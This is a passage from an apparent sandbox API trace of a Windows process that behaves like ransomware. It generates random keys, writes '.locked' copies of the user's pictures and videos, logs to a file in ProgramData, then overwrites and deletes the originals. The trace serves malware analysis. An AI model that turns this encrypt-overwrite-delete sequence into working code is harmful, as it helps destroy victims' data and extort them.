lpNumberOfBytesWritten=0x12659d78, lpOverlapped=0x0 | out: lpBuffer=0x12ba0000*, lpNumberOfBytesWritten=0x12659d78*=0x80, lpOverlapped=0x0) returned 1 [0314.325] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0314.329] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0314.329] SetEvent (hEvent=0x20c) returned 1 [0314.329] SetEvent (hEvent=0x1b8) returned 1 [0314.329] ReadFile (in: hFile=0x218, lpBuffer=0x15efe000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x15efe000*, lpNumberOfBytesRead=0x12659d68*=0x217f, lpOverlapped=0x0) returned 1 [0314.331] WriteFile (in: hFile=0x1c8, lpBuffer=0x15efe000*, nNumberOfBytesToWrite=0x217f, lpNumberOfBytesWritten=0x12659d74, lpOverlapped=0x0 | out: lpBuffer=0x15efe000*, lpNumberOfBytesWritten=0x12659d74*=0x217f, lpOverlapped=0x0) returned 1 [0314.378] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.383] SetEvent (hEvent=0x20c) returned 1 [0314.383] ReadFile (in: hFile=0x218, lpBuffer=0x15efe000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x15efe000*, lpNumberOfBytesRead=0x12659d68*=0x0, lpOverlapped=0x0) returned 1 [0314.383] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.538] CloseHandle (hObject=0x1c8) returned 1 [0314.539] CloseHandle (hObject=0x218) returned 1 [0314.539] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0314.539] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x12659e94 | out: lpMode=0x12659e94) returned 0 [0314.539] WriteFile (in: hFile=0x218, lpBuffer=0x123501c0*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x12659e64, lpOverlapped=0x0 | out: lpBuffer=0x123501c0*, lpNumberOfBytesWritten=0x12659e64*=0x70, lpOverlapped=0x0) returned 1 [0314.539] CloseHandle (hObject=0x218) returned 1 [0314.540] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\pfXi8.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\pfxi8.bmp")) returned 1 [0314.543] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.673] SetEvent (hEvent=0x12c) returned 1 [0314.673] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.685] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.686] SetEvent (hEvent=0x220) returned 1 [0314.686] SetEvent (hEvent=0x1f0) returned 1 [0314.687] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.771] SetEvent (hEvent=0x1b8) returned 1 [0314.771] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.815] SetEvent (hEvent=0x12c) returned 1 [0314.815] SetEvent (hEvent=0x22c) returned 1 [0314.815] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.945] SetEvent (hEvent=0x1e8) returned 1 [0314.945] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.970] SetEvent (hEvent=0x184) returned 1 [0314.970] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.977] SetEvent (hEvent=0x14c) returned 1 [0314.977] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.044] SetEvent (hEvent=0x190) returned 1 [0315.044] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0315.055] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.055] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0315.056] SetEvent (hEvent=0x184) returned 1 [0315.056] SetEvent (hEvent=0x190) returned 1 [0315.056] SetEvent (hEvent=0x12c) returned 1 [0315.056] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.057] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0315.057] SetEvent (hEvent=0x150) returned 1 [0315.057] SetEvent (hEvent=0x12c) returned 1 [0315.057] SetEvent (hEvent=0x22c) returned 1 [0315.057] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.086] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\QRa-hJxxUp2Ecy98M.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\qra-hjxxup2ecy98m.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0315.105] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.136] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x125dfe88 | out: lpMode=0x125dfe88) returned 0 [0315.136] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.219] WriteFile (in: hFile=0x224, lpBuffer=0x18206000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dfe78, lpOverlapped=0x0 | out: lpBuffer=0x18206000*, lpNumberOfBytesWritten=0x125dfe78*=0xfa000, lpOverlapped=0x0) returned 1 [0315.244] CloseHandle (hObject=0x224) returned 1 [0315.312] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\QRa-hJxxUp2Ecy98M.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\qra-hjxxup2ecy98m.gif")) returned 1 [0315.369] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.412] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.413] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.421] SetEvent (hEvent=0x220) returned 1 [0315.421] SetEvent (hEvent=0x14c) returned 1 [0315.421] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.438] SetEvent (hEvent=0x190) returned 1 [0315.438] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0315.469] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.469] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0315.477] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.477] SetEvent (hEvent=0x184) returned 1 [0315.477] SetEvent (hEvent=0x20c) returned 1 [0315.477] SetEvent (hEvent=0x220) returned 1 [0315.477] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.479] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0315.479] SetEvent (hEvent=0x220) returned 1 [0315.479] SetEvent (hEvent=0x20c) returned 1 [0315.479] SetEvent (hEvent=0x22c) returned 1 [0315.479] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.810] SetEvent (hEvent=0x220) returned 1 [0315.810] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.859] SetEvent (hEvent=0x1f0) returned 1 [0315.859] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.870] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.891] SetEvent (hEvent=0x1b8) returned 1 [0315.891] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.937] SetEvent (hEvent=0x12c) returned 1 [0315.937] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0315.942] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.949] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0315.951] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.951] SetEvent (hEvent=0x1e8) returned 1 [0315.951] SetEvent (hEvent=0x1f0) returned 1 [0315.951] SetEvent (hEvent=0x190) returned 1 [0315.951] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0315.953] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0315.953] SetEvent (hEvent=0x150) returned 1 [0315.953] SetEvent (hEvent=0x190) returned 1 [0315.953] WriteFile (in: hFile=0x218, lpBuffer=0x12380140*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x125dfe64, lpOverlapped=0x0 | out: lpBuffer=0x12380140*, lpNumberOfBytesWritten=0x125dfe64*=0x3c, lpOverlapped=0x0) returned 1 [0315.953] CloseHandle (hObject=0x218) returned 1 [0315.953] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\D5is0-m1xKE.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\d5is0-m1xke.png")) returned 1 [0315.995] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0316.001] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0316.001] SetEvent (hEvent=0x150) returned 1 [0316.001] SetEvent (hEvent=0x20c) returned 1 [0316.001] SetEvent (hEvent=0x1f0) returned 1 [0316.023] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\D5is0-m1xKE.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\d5is0-m1xke.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0316.034] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0316.346] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125dfe88 | out: lpMode=0x125dfe88) returned 0 [0316.347] WriteFile (in: hFile=0x1a4, lpBuffer=0x148ee000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dfe78, lpOverlapped=0x0 | out: lpBuffer=0x148ee000*, lpNumberOfBytesWritten=0x125dfe78*=0xfa000, lpOverlapped=0x0) returned 1 [0316.375] CloseHandle (hObject=0x1a4) returned 1 [0316.396] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0316.525] SetEvent (hEvent=0x1ac) returned 1 [0316.525] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0316.545] SetEvent (hEvent=0x12c) returned 1 [0316.545] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0316.816] SetEvent (hEvent=0x134) returned 1 [0316.816] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0316.899] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0316.949] SetEvent (hEvent=0x190) returned 1 [0316.949] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0316.977] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0316.977] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0316.982] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0316.982] SetEvent (hEvent=0x134) returned 1 [0316.982] SetEvent (hEvent=0x20c) returned 1 [0316.982] SetEvent (hEvent=0x190) returned 1 [0316.982] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0316.983] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0316.984] SetEvent (hEvent=0x150) returned 1 [0316.984] SetEvent (hEvent=0x190) returned 1 [0316.984] SetEvent (hEvent=0x20c) returned 1 [0316.984] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\di-h-v4MS65pv.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\di-h-v4ms65pv.png")) returned 1 [0316.990] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\PjJi9JDPq9zU_NC m384.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\pjji9jdpq9zu_nc m384.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0316.991] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0316.991] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\PjJi9JDPq9zU_NC m384.flv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\pjji9jdpq9zu_nc m384.flv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0316.991] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0316.991] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0316.991] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e100 | out: pbBuffer=0x1234e100) returned 1 [0316.992] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c201 | out: pbBuffer=0x1237c201) returned 1 [0316.992] WriteFile (in: hFile=0x1c0, lpBuffer=0x12678000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265dd78, lpOverlapped=0x0 | out: lpBuffer=0x12678000*, lpNumberOfBytesWritten=0x1265dd78*=0x80, lpOverlapped=0x0) returned 1 [0316.995] ReadFile (in: hFile=0x230, lpBuffer=0x16970000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x16970000*, lpNumberOfBytesRead=0x1265dd68*=0xa410, lpOverlapped=0x0) returned 1 [0317.000] WriteFile (in: hFile=0x1c0, lpBuffer=0x16970000*, nNumberOfBytesToWrite=0xa410, lpNumberOfBytesWritten=0x1265dd74, lpOverlapped=0x0 | out: lpBuffer=0x16970000*, lpNumberOfBytesWritten=0x1265dd74*=0xa410, lpOverlapped=0x0) returned 1 [0317.009] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0317.058] ReadFile (in: hFile=0x230, lpBuffer=0x16970000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x16970000*, lpNumberOfBytesRead=0x1265dd68*=0x0, lpOverlapped=0x0) returned 1 [0317.058] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0317.195] CloseHandle (hObject=0x1c0) returned 1 [0317.388] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0317.402] CloseHandle (hObject=0x230) returned 1 [0317.402] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0317.403] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1265de94 | out: lpMode=0x1265de94) returned 0 [0317.403] WriteFile (in: hFile=0x230, lpBuffer=0x126700c0*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x1265de64, lpOverlapped=0x0 | out: lpBuffer=0x126700c0*, lpNumberOfBytesWritten=0x1265de64*=0x3b, lpOverlapped=0x0) returned 1 [0317.403] CloseHandle (hObject=0x230) returned 1 [0317.403] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\PjJi9JDPq9zU_NC m384.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\pjji9jdpq9zu_nc m384.flv")) returned 1 [0317.515] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0317.575] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0317.579] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0317.579] SetEvent (hEvent=0x150) returned 1 [0317.579] SetEvent (hEvent=0x20c) returned 1 [0317.579] SetEvent (hEvent=0x190) returned 1 [0317.579] SetEvent (hEvent=0x1ac) returned 1 [0317.595] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0317.597] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0317.597] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0317.598] SetEvent (hEvent=0x134) returned 1 [0317.598] SetEvent (hEvent=0x1ac) returned 1 [0317.598] SetEvent (hEvent=0x190) returned 1 [0317.598] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0317.599] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0317.599] SetEvent (hEvent=0x150) returned 1 [0317.599] SetEvent (hEvent=0x1ac) returned 1 [0317.599] SetEvent (hEvent=0x190) returned 1 [0317.599] SetEvent (hEvent=0x134) returned 1 [0317.609] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0317.612] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0317.612] SetEvent (hEvent=0x190) returned 1 [0317.612] SetEvent (hEvent=0x134) returned 1 [0317.612] SetEvent (hEvent=0x1ac) returned 1 [0317.613] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\PjJi9JDPq9zU_NC m384.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\pjji9jdpq9zu_nc m384.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0317.616] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0317.723] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x1248de88 | out: lpMode=0x1248de88) returned 0 [0317.723] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0317.729] SetEvent (hEvent=0x220) returned 1 [0317.729] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0317.768] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UNI9RnsVnTQHak 3L.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uni9rnsvntqhak 3l.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0317.806] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0317.833] SetEvent (hEvent=0x150) returned 1 [0317.833] SetEvent (hEvent=0x22c) returned 1 [0317.833] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1276fe88 | out: lpMode=0x1276fe88) returned 0 [0317.833] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0317.891] WriteFile (in: hFile=0x1f4, lpBuffer=0x1485c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276fe78, lpOverlapped=0x0 | out: lpBuffer=0x1485c000*, lpNumberOfBytesWritten=0x1276fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0317.921] CloseHandle (hObject=0x1f4) returned 1 [0317.921] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UNI9RnsVnTQHak 3L.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uni9rnsvntqhak 3l.mp4")) returned 1 [0317.986] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0318.222] SetEvent (hEvent=0x190) returned 1 [0318.222] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0318.251] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1262fa24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x1262fa24*=0xc) returned 1 [0318.252] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\X12qhHpa.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\x12qhhpa.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0318.252] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1262fd9c | out: lpMode=0x1262fd9c) returned 0 [0318.252] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\X12qhHpa.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\x12qhhpa.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0318.631] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0318.683] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1262fd9c | out: lpMode=0x1262fd9c) returned 0 [0318.683] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0318.683] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e030 | out: pbBuffer=0x1234e030) returned 1 [0318.683] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340401 | out: pbBuffer=0x12340401) returned 1 [0318.683] WriteFile (in: hFile=0x218, lpBuffer=0x126ad000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1262fd78, lpOverlapped=0x0 | out: lpBuffer=0x126ad000*, lpNumberOfBytesWritten=0x1262fd78*=0x80, lpOverlapped=0x0) returned 1 [0318.687] ReadFile (in: hFile=0x230, lpBuffer=0x14246000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1262fd68, lpOverlapped=0x0 | out: lpBuffer=0x14246000*, lpNumberOfBytesRead=0x1262fd68*=0x11b25, lpOverlapped=0x0) returned 1 [0318.690] WriteFile (in: hFile=0x218, lpBuffer=0x14246000*, nNumberOfBytesToWrite=0x11b25, lpNumberOfBytesWritten=0x1262fd74, lpOverlapped=0x0 | out: lpBuffer=0x14246000*, lpNumberOfBytesWritten=0x1262fd74*=0x11b25, lpOverlapped=0x0) returned 1 [0318.756] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0318.934] ReadFile (in: hFile=0x230, lpBuffer=0x14246000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1262fd68, lpOverlapped=0x0 | out: lpBuffer=0x14246000*, lpNumberOfBytesRead=0x1262fd68*=0x0, lpOverlapped=0x0) returned 1 [0318.934] CloseHandle (hObject=0x218) returned 1 [0318.936] CloseHandle (hObject=0x230) returned 1 [0318.936] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0318.936] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1262fe94 | out: lpMode=0x1262fe94) returned 0 [0318.936] WriteFile (in: hFile=0x230, lpBuffer=0x12670180*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x1262fe64, lpOverlapped=0x0 | out: lpBuffer=0x12670180*, lpNumberOfBytesWritten=0x1262fe64*=0x3c, lpOverlapped=0x0) returned 1 [0318.936] CloseHandle (hObject=0x230) returned 1 [0318.937] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\X12qhHpa.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\x12qhhpa.mp4")) returned 1 [0319.255] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0319.697] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0319.703] SetEvent (hEvent=0x220) returned 1 [0319.703] SetEvent (hEvent=0x1dc) returned 1 [0319.703] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0320.206] SetEvent (hEvent=0x134) returned 1 [0320.206] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0320.211] SetEvent (hEvent=0x198) returned 1 [0320.211] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0320.213] SetEvent (hEvent=0x198) returned 1 [0320.213] SetEvent (hEvent=0x1f0) returned 1 [0320.213] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0320.363] SetEvent (hEvent=0x184) returned 1 [0320.363] SetEvent (hEvent=0x180) returned 1 [0320.363] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0320.841] SetEvent (hEvent=0x134) returned 1 [0320.841] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0320.863] 